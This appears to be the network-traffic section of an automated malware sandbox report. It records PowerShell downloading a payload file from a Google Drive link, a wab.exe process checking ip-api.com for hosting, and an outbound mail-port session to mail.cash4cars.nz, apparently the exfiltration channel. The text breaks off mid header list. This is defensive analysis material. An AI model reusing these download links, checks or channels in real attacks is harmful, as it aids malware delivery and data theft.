                                                                      Apr 18, 2024 10:11:45.751223087 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.753448009 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.755986929 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.756057978 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.756062984 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.756112099 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.756115913 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.758570910 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.758641958 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.758647919 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.758692026 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.760979891 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.763282061 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.763360977 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.763365984 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.763412952 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.763417959 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.763461113 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.765647888 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.768028975 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.768033028 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.768059969 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.768085957 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.768131971 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.768181086 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.770467043 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.770536900 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.770541906 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.770585060 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.772737980 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.774024010 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.774137020 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.774142981 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.774185896 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.776309013 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.778548002 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.778637886 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.778639078 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.778665066 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.778687954 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.778711081 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.780917883 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.783153057 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.783230066 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.783236027 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.783283949 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.783288956 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.783335924 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.785406113 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.787627935 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.787694931 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.787699938 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.787745953 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.787750959 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.787794113 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.789881945 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.791939974 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.791944027 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.791997910 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.792066097 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.792114973 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.792175055 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.792224884 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.794208050 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.794272900 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.794310093 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.794363022 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.796283007 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.797110081 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.797115088 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.797158003 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.798404932 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.799966097 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.799969912 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.800014973 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.800539017 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.800601006 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.801551104 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.801609039 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.801651955 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.801696062 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.803713083 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.803782940 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.803805113 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.804153919 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.804158926 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.804219961 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.805702925 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.805766106 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.805793047 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.805845022 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.807693005 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.807756901 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.807796001 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.807847977 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.809737921 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.811769009 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.811851978 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.811857939 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.811886072 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.811914921 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.811944962 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.813713074 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.815790892 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.815865040 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.815870047 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.815915108 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.815918922 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.815963030 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.817821026 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.819735050 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.819813013 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.819817066 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.819868088 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.819871902 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.819919109 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.821681023 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.823506117 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.823582888 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.823586941 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.823637009 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.823642015 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.823685884 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.825253963 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.826175928 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.826250076 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.826255083 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.826298952 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.827801943 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.827867985 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.827897072 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.827945948 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.829513073 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.831196070 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.831288099 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.831295013 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.831316948 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.831347942 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.831382990 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.832803011 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.834431887 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.834512949 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.834517956 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.834566116 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.834570885 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.834615946 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.835990906 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.836049080 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.836087942 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.836148024 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.837546110 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.837605000 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.837629080 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.837680101 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:45.837744951 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:45.837796926 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:46.059096098 CEST49711443192.168.2.674.125.138.132
                                                                      Apr 18, 2024 10:11:46.059108973 CEST4434971174.125.138.132192.168.2.6
                                                                      Apr 18, 2024 10:11:46.805531979 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:11:46.922662020 CEST8049712208.95.112.1192.168.2.6
                                                                      Apr 18, 2024 10:11:46.922753096 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:11:46.923084974 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:11:47.041090965 CEST8049712208.95.112.1192.168.2.6
                                                                      Apr 18, 2024 10:11:47.156424999 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:11:49.105830908 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:49.406330109 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:49.406594992 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:50.276644945 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:50.276855946 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:50.577410936 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:50.577749968 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:50.880078077 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:50.882688046 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.199997902 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.200062037 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.200126886 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.200159073 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.217938900 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.518431902 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.537666082 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.837871075 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.839489937 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:52.140182018 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:52.140902996 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:52.454384089 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:52.454710960 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:52.754985094 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:52.755297899 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.055692911 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.055948019 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.356408119 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.357220888 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.357258081 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.357361078 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.357383966 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.658437967 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.658490896 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.658524036 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.658559084 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.664000034 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.718936920 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:12:20.479226112 CEST8049712208.95.112.1192.168.2.6
                                                                      Apr 18, 2024 10:12:20.479301929 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:12:38.516314983 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:12:38.633383989 CEST8049712208.95.112.1192.168.2.6

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 18, 2024 10:10:57.517328978 CEST6294553192.168.2.61.1.1.1
                                                                      Apr 18, 2024 10:10:57.621870041 CEST53629451.1.1.1192.168.2.6
                                                                      Apr 18, 2024 10:10:58.096810102 CEST6170053192.168.2.61.1.1.1
                                                                      Apr 18, 2024 10:10:58.202159882 CEST53617001.1.1.1192.168.2.6
                                                                      Apr 18, 2024 10:11:46.690378904 CEST4965353192.168.2.61.1.1.1
                                                                      Apr 18, 2024 10:11:46.794575930 CEST53496531.1.1.1192.168.2.6
                                                                      Apr 18, 2024 10:11:48.514574051 CEST5169153192.168.2.61.1.1.1
                                                                      Apr 18, 2024 10:11:49.105072975 CEST53516911.1.1.1192.168.2.6

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 18, 2024 10:10:57.517328978 CEST192.168.2.61.1.1.10x6618Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:58.096810102 CEST192.168.2.61.1.1.10xa9e6Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:11:46.690378904 CEST192.168.2.61.1.1.10xd035Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:11:48.514574051 CEST192.168.2.61.1.1.10x3eddStandard query (0)mail.cash4cars.nzA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 18, 2024 10:10:57.621870041 CEST1.1.1.1192.168.2.60x6618No error (0)drive.google.com64.233.185.138A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:57.621870041 CEST1.1.1.1192.168.2.60x6618No error (0)drive.google.com64.233.185.101A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:57.621870041 CEST1.1.1.1192.168.2.60x6618No error (0)drive.google.com64.233.185.139A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:57.621870041 CEST1.1.1.1192.168.2.60x6618No error (0)drive.google.com64.233.185.102A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:57.621870041 CEST1.1.1.1192.168.2.60x6618No error (0)drive.google.com64.233.185.100A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:57.621870041 CEST1.1.1.1192.168.2.60x6618No error (0)drive.google.com64.233.185.113A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:10:58.202159882 CEST1.1.1.1192.168.2.60xa9e6No error (0)drive.usercontent.google.com74.125.138.132A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:11:46.794575930 CEST1.1.1.1192.168.2.60xd035No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                      Apr 18, 2024 10:11:49.105072975 CEST1.1.1.1192.168.2.60x3eddNo error (0)mail.cash4cars.nz114.142.162.17A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • drive.google.com
                                                                      • drive.usercontent.google.com
                                                                      • ip-api.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649712208.95.112.1807068C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 18, 2024 10:11:46.923084974 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Apr 18, 2024 10:11:47.041090965 CEST174INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 08:11:46 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 5
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 74 72 75 65 0a
                                                                      Data Ascii: true


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.64970064.233.185.1384435672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 08:10:57 UTC215OUTGET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: drive.google.com
                                                                      Connection: Keep-Alive
                                                                      2024-04-18 08:10:58 UTC1582INHTTP/1.1 303 See Other
                                                                      Content-Type: application/binary
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 18 Apr 2024 08:10:58 GMT
                                                                      Location: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                      Content-Security-Policy: script-src 'nonce--I-mHTVpr_kf3ASyM7aJGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Server: ESF
                                                                      Content-Length: 0
                                                                      X-XSS-Protection: 0
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      X-Content-Type-Options: nosniff
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.64970174.125.138.1324435672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-18 08:10:58 UTC233OUTGET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: drive.usercontent.google.com
                                                                      Connection: Keep-Alive
                                                                      2024-04-18 08:10:59 UTC4753INHTTP/1.1 200 OK
                                                                      Content-Type: application/octet-stream
                                                                      Content-Security-Policy: sandbox
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                      X-Content-Security-Policy: sandbox
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                      Cross-Origin-Resource-Policy: same-site
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Disposition: attachment; filename="Missuiting.mix"
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Credentials: false
                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, 